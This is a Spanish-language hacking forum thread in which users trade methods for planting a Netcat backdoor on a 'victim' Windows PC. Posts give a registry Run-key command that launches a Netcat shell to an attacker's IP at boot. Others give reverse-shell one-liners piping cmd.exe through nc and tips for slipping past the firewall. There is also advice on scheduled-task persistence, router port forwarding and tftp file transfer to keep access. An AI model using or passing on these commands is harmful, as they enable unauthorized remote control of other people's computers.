 Autor
|
Tema: Paper: Obtener shell con Netcat (Leído 59030 veces)
|
Kase
 Desconectado
Mensajes: 771
Tavrist
|
Veamos, tengo mi pc a la escuxa del puerto 25 y 80, tengo a mi victima con el netcat instalado y con esta entrada en su registro:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windows /t REG_SZ /d "C:\windows\system32\nc -d 80.37.0.3| cmd.exe | nc -d 80.37.0.3"
Bien al arrancar su pc se conectaria a mi pc, pero ai un problema que nadie a comentado, mi victima usa tarjeta inalambrica y tarda entre 60 y 120 segundos aproximadamente en conectarse ainternet, por lo tanto
Su netcat a intentado conectarse a mi antes de que tuviera conexion a internet, y ya no vuelve a intentarlo.
Tiene esto solucion?
bueno boy empesando en esto, pero supongo que la solucion es poner que se conecte como 5 minutos despues? o que tal que lo haga a una ora que ya sabes que se conectara? yo tengo una duda que no se si ya la ayan puesto, no logree leerme las 9 paginas >.< solo yege ala 3 y me arte *.* bueno es... si tienes el acceso remotamente para poner al netcat, y ejecutar los comandos y todo eso, tiene algun caso?... creo que ya tienes acceso remotamente ala pc... >.< pa que kieres volverte a meter si ya estas adentro... lo que le veo de interes seria el poder dejarlo como backdoor... pero si tengo ip dinamica, y la victima tambien.. posss :S que hago? aora tambien ay un router (de la victima) y un modem adsl (mio) de pormedio... asi que lo que tendria que hacer es? poner al netcat, en la victima. a que mande la informacion ala ip de mi modem? y umm no me explico creo lo pongo con manzanas xD yo ---x ---- mi modem <-------------router<-------victima (esto en el caso de que yo este en espera ) inverso yo ----------->mi modem------------>router----x----victima como soluciono esto... en este caso si tengo axeso fisico ala pc victima.. pero cuando no yege a tener el acceso ( en un futuro, con otra victima) que puedo hacer? o me pregunto si abra alguna forma de expecificarle al netcat que mande los paketes a tal ip y lugo a tal ip? o.O aora es necesario los 3 caso, por que yo senti que con el primero o el segundo termina ciendo = que el tercero... osea ya los 3 son "indetectables" en pc sin protexion asi que keda a mi decision cual haga, o ay una opcion mejor que otra y tenia otra duda pero se me fue la onda >.< bueno gracias por su apoyo, por adelantado... ya recorde otra nc 192.168.1.2 80 | cmd.exe | nc 192.168.1.2 25 eso en rojo es una l (L) o que p*** signo es?, como lo pongo xD gracias por su comprension xD aun soy noob ___________________________________________ editado bueno ya resolbi este problema aora tambien ay un router (de la victima) y un modem adsl (mio) de pormedio... asi que lo que tendria que hacer es? poner al netcat, en la victima. a que mande la informacion ala ip de mi modem? y umm no me explico creo lo pongo con manzanas xD
yo ---x ---- mi modem <-------------router<-------victima
(esto en el caso de que yo este en espera )
inverso
yo ----------->mi modem------------>router----x----victima
como soluciono esto... en este caso si tengo axeso fisico ala pc victima.. pero cuando no yege a tener el acceso ( en un futuro, con otra victima) que puedo hacer?
con un no-ip, xD no lo avia pensado, pero me pregunto si embes de ejecutar el shell ummm ejecutar el cmd remotamente, podria hacer que ejecute ftp remotamente, o telnet ( kisas) poke en el caso de que kiera pasarme archivos de esa pc ala mia, o yo a esa pc ... pues no se como aserlo con cmd >.< se que con ftp sep uede, o porlomenos lo comprendo mas... umm como pdria pasarme archivos con el ms-dos, en todo caso que ejecute cmd enves de ftp o.O espero me aya explicado >.< |
|
|
|
« Última modificación: 19 Febrero 2006, 22:01 por Tavrist »
|
En línea
|
|
|
|
firewer
Desconectado
Mensajes: 120
|
Tavrist lo de hacer que se ejecute 5 minutos despues ya lo habia pensado, la cuestion es COMO e mirado de hacerlo a
traves del programador de tareas
at 8:00p /every: "c:\windows\netcatip.bat"
ese comando se ejecutaria a las 20:00 UNA vez al mes, en el numero del mes que se ejecute.
y habria que crear 31 tareas y duplicadas para que se ejecutara x la mañana y noche si no sabemos cuando se conecta. ya son 62 tareas..
Pero si quiero que lo haga diariamente con una sola tarea tengo que hacerlo a traves de inicio/todos los programas.... y si le copio el archivo.job en su carpeta c:\windows\tasks
Da error al iniciar puesto que no en todos los pcs tienen el mismo nombre de usuario lo pongo para que se ejecute como "system" pero no da resultado.
Alguien me da alguna solucion?
|
|
|
|
|
En línea
|
|
|
|
Kase
Desconectado
Mensajes: 771
Tavrist
|
enves de hacer revers shill as shill normal, en ese caso, la compu victima se kedara esperando el atake, enves de iniciar el atake 1 sola ves... el problema seria el firewall, pero con que pase la primeraves, basta =)
ay un problema
me ocurre un problema logro hacer el revers shill en pcs, en red, o en pc remotamente, pero cuando me enfrento remotamente a una red.. (auke tengo acceso fisico) no logro hacer el revers ni nada
seme presenta el problema que ponerle en el campo de ip por ejempo nc -d -e cmd.exe x.x.x.x xx
eso en el ekipo victima, ( mi pc esta en red) asi que no se si en x.x.x.x pongo mi ip ( de mi pc) o la ip publica ( la del ruter) si pongo la publica, los paketes llegan a ruter pero no se mandan ala pc, si pongo la de pc no encuentra el camino...
intente con un no-ip, pero sucede = no se si lo hago bien o mal... en el no-ip e tratado de poner = la ip publica y la ip de mi pc...
pero se sigue perdiendo los paketes. o.O
(si descarge el programa de no-ip y si tengo cuenta y un el host de no-ip, y si si lo activo en mi pc, y sin embargo no llega la informacion o.O.. no se si no redireciona,o si necesito algo mas, como una guia de np-ip xD auke es tonto por que ya es bastante sencillo, y no lo logro hacer funcionar >.<)
si desactive el firewall y si logro hacer el revers shill y el shill normal, dentro de la red, y remotamente. a ekipos con ip publica
no se si sele puedo especificar al nc que despues de la ip publica aya una con red, (la cual tambien conozco)
|
|
|
|
« Última modificación: 22 Febrero 2006, 17:00 por Tavrist »
|
En línea
|
|
|
|
|
zhyzura
|
creo que con citar esta parte de tu post contestare a todas tus dudas: seme presenta el problema que ponerle en el campo de ip por ejempo nc -d -e cmd.exe x.x.x.x xx
eso en el ekipo victima, ( mi pc esta en red) asi que no se si en x.x.x.x pongo mi ip ( de mi pc) o la ip publica ( la del ruter) si pongo la publica, los paketes llegan a ruter pero no se mandan ala pc, si pongo la de pc no encuentra el camino... Para resolverte tu duda cabe hacer recordar que existen dos tipos de ip: IP privada: Este tipo de ip no son accesibles desde internet solamente son accesibles a equipos que pertenescan a tu propia red o dominio. IP publica: este tipo de ip son accesibles desde cualquier ordenador con acceso a internet debido a que son ips que estan conectadas directamente a internet. Una vez entendido esto procedo. La ip que tienes en tu computadora es una ip privada por lo tanto nunca deberas de poner esa ip en tu equipo victima en caso de que ella este en una red distinta a la tuya (que es tu caso). Lo que tienes que hacer aqui es sencillo, en lugar de poner la ip de tu ordenador, tendras que poner la ip de tu router... OJO!!!!la ip publica ( la del ruter) si pongo la publica, los paketes llegan a ruter pero no se mandan ala pc esto que tu mencionas es completamente correcto, por ello siemore que vayamos a utilizar la ip del router primero debemos de configurarlo de forma que al momento de recibir una peticion en el puerto 4000 (por ejemplo), automaticamente la redireccione a la ip privada de nuestra computadora. A este proceso se le conoce como mapear puertos en el router, ¿como hago esto? el problema consiste en tener acceso a nuestro router asi como tambien tendremos que buscar una opcion que diga "ip fowarding", "NAT", "Virtual server" o algo por estilo, no me puedo poner a explicarte como hacer esto debido a que para ello ocupamos saber el modelo de tu router en concreto y ademas tendremos que ponernos a leer el manual para explicarte como hacerlo paso por paso, cosa que no creo necesaria, solo basta con que busques el manual de tu router y le des una leida tu mismo  ya te explique en teoria como seria solo falta que lo pongas en practica con tu propio router. saludos |
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
lord_iNtro
Desconectado
Mensajes: 6
Every time I think computers...
|
Si, puedes enviarle un programa hecho por ti por tftp, por ejemplo, que haga que el netcat realice la conexion a tu host cada minuto si no está ya conectado.. una idea  |
|
|
|
|
En línea
|
^^Solo se que no se nada, mas de eso me baso^^
|
|
|
firewer
Desconectado
Mensajes: 120
|
lord_iNtro
Eso es muy facil de decir.. pero no de hacer! llevo mas de una semana intentandolo..
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
¿y por que no utilizan el programador de tareas?
claro que no lo tendrian que poner cada minuto, aunque si pueden hacerlo cada media hora u hora entera(es una sugerencia).
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
AKuMA^Newbie
Desconectado
Mensajes: 5
|
Publicado por: zhyzura (¡enhorabuena, muy buen texto!) [VOLTEAR LA SHELL CON NETCAT] Nota: en este tipo de conexion no vamos a necesitar que ambos equipos tengan ip publica, basta con que el atacante tenga una, ademas de que ambos equipos tengan habilitada la entrada en el puerto 80 y la salida en el puerto 25. En primer lugar vamos a necesitar poner dos netcat a la escucha en el equipo atacante (cada uno en su propia ventana o indicador de comando, como gusten llamarle). en uno ponemos el puerto 80: Código: nc -vv -l -p 80 y en el otro ponemos el puerto 25: Código: nc -vv -l -p 25 Ya que tenemos todo listo, basta con que el equipo victima ejecute el siguiente comando (recordar que en mi ejemplo el atacante tiene ip 192.168.1.2): Código: nc 192.168.1.2 80 | cmd.exe | nc 192.168.1.2 25 y walaa!!!!! ya tenemos la shell de nuestra victima y el firewall del sp2 no dira ni pio, ya que por defecto admite la entrada de informacion por el puerto 80 y la salida por el 25. ======================================= He seguido todos estos pasos y la "víctima" al escribir "nc ip.ip.ip.ip 80 | cmd.exe | nc ip.ip.ip.ip 25" ha obtenido el siguiente mensaje: "Microsoft" no se reconoce como un comando interno o externo, programa o archivo por lotes ejecutable.  ¿¿Esto que locura es?? P.D: ¿que función desempeñan las barras verticales "|"? |
|
|
|
|
En línea
|
Yo SÍ sé lo que es trabajar duro, porque lo he visto...
|
|
|
|
zhyzura
|
te dice eso por que no tienes el programa instalado en esa computadora, bajatelo de alguna pagina web, es facil de encontrar.
las barras verticales no son "L" esas barras las pueden sacar en codigo ASCII con Alt+124 y listo, y nos sirve para unir en este caso dos comandos a la vez los cuales son conectarse a una ip remota mandandole cmd y dejando otro puerto en escucha.
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
AKuMA^Newbie
Desconectado
Mensajes: 5
|
Pero es que el programa sí está instalado en la otra computadora y la víctima escribió los comandos desde el directorio que estaba instalao. ... Ya sé que las barras verticales no son "L"...  Mas sencillo escribir alt gr+1.. no? |
|
|
|
|
En línea
|
Yo SÍ sé lo que es trabajar duro, porque lo he visto...
|
|
|
|
zhyzura
|
ahora que me fijo un poco xD "Microsoft" no se reconoce como un comando interno o externo, programa o archivo por lotes ejecutable. por lo que veo tecleo al principio microsoft y por eso no hizo nada  , intenten a realizar nuevamente la prueva y nos cuentan... |
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
K41N
Desconectado
Mensajes: 6
Ctrl+Alt+Supr
|
Zhyzura muy bueno el manual... contigo aprenderemos muxo!!!!
He estado practicando con el NC y haciendo la prueba de voltear
la reverse shell , mi pc elige otros puertos para salir (2213,2214)
pero supongo que es porque lo he echo el localhost no? Lo que no entiendo es por que no avisa el Outpost de 1 conexion saliente tan
sospechosa....
SALUDOS
|
|
|
|
|
En línea
|
Mi HD es mi cerebro, mi firewall son mi ojos, mi CPU son mis manos, Sistema= 100% Seguro... (ahh y el ojete no es un bug)
|
|
|
BloodeR
Desconectado
Mensajes: 17
|
pregu.. es posible obtener shell remota sin acceso fisica a la pc victima? si es posible, como hacerlo?
|
|
|
|
|
En línea
|
|
|
|
|
zhyzura
|
respuesta:
- troyanos
- exploits
creo que te hace falta leer un poco mas al respecto...
|
|
|
|
|
En línea
|
- - -->> Sie urteilen zu uns seiend unterschiedlich <<-- - - unser Durst des
Wissens ist unersättlich |
|
|
yermain
Desconectado
Mensajes: 40
|
Bueno, pues el manual está muy bueno, ¡felicidades zhyzura! Mi duda es más bien si puedo mandarle el netcat a la víctima por tftp, ya que en los post que he leído de tftp los comandos se ejecutan desde la víctima que accede a nuestro servidor, y para ello hay que tener su shell remota por ejemplo con el netcat, vaya círculo vicioso ¿hay alguna forma de usar el tftp con un puerto distinto al 69? ya que estoy en red tras router y firewall y no hay comunicación directa PC-PC de la misma red, es a través del router |
|
|
|
|
En línea
|
|
|
|
|
 |
